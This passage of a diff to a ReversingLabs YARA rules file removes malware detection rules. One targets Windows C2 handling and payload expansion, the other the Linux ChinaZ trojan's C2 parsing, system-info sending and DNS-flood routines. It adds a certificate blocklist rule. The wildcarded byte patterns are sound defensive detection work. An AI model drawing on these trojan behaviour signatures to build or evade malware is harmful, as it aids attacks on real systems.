-            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B
-            CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B
-            AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3
-        }
-		$cmd_expand_payload_p1 = {
-            40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
-            ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC
-            24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44
-            89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ??
-            E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7
-            44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33
-            D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ??
-            ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF
-            15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ??
-            ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ??
-            ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
-            33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$cmd_expand_payload_p2 = {
-            44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24
-            ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C
-            89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8
-            ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ??
-            ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB
-            FF 15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC
-            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            41 5D 5D 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( all of ( $cmd_expand_payload_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ChinaZ trojan."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f99c224b-db54-5cae-b5fb-8939ebee3250"
-		date = "2024-07-31"
-		modified = "2024-07-31"
+		id = "44c878ab-75b2-5cd3-a019-94982a508e0f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10716-L10732"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "ChinaZ"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$collect_system_information_32_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31
-            FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ??
-            ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ??
-            29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69
-            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
-            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
-            8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1
-        }
-		$collect_system_information_32_p2 = {
-            C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89
-            DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0
-            C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ??
-            ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3
-            AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F
-            85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
-            C3
-        }
-		$send_system_info_32 = {
-            57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44
-            24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69
-            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
-            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
-            C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3
-        }
-		$parse_c2_commands_32 = {
-            55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24
-            ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ??
-            ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
-            8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89
-            D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89
-            54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3
-        }
-		$dns_flood_32_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B
-            B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8
-            ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ??
-            ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D
-            44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ??
-            89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ??
-            ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ??
-            ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ??
-            ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54
-        }
-		$dns_flood_32_p2 = {
-            24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00
-            ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ??
-            74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ??
-            ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74
-            24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2
-            C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ??
-            8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44
-            24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8
-        }
-		$collect_system_information_64_p1 = {
-            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ??
-            ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ??
-            ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45
-            31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ??
-            2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ??
-            01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB
-        }
-		$collect_system_information_64_p2 = {
-            48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24
-            ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9
-            ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ??
-            85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3
-            48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85
-            ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9
-            BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3
-        }
-		$send_system_info_64 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48
-            8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89
-            C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24
-            ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29
-            DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0
-            F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ??
-            BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ??
-            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3
-        }
-		$parse_c2_commands_64 = {
-            41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48
-            8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ??
-            ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9
-            BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ??
-            ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ??
-            ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ??
-            ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85
-            ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ??
-            ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B
-            84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24
-            ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ??
-            48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ??
-            4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24
-            ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ??
-            4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24
-            ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24
-        }
-		$dns_flood_64_p1 = {
-            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89
-            FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5
-            8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0
-            E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ??
-            66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ??
-            ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48
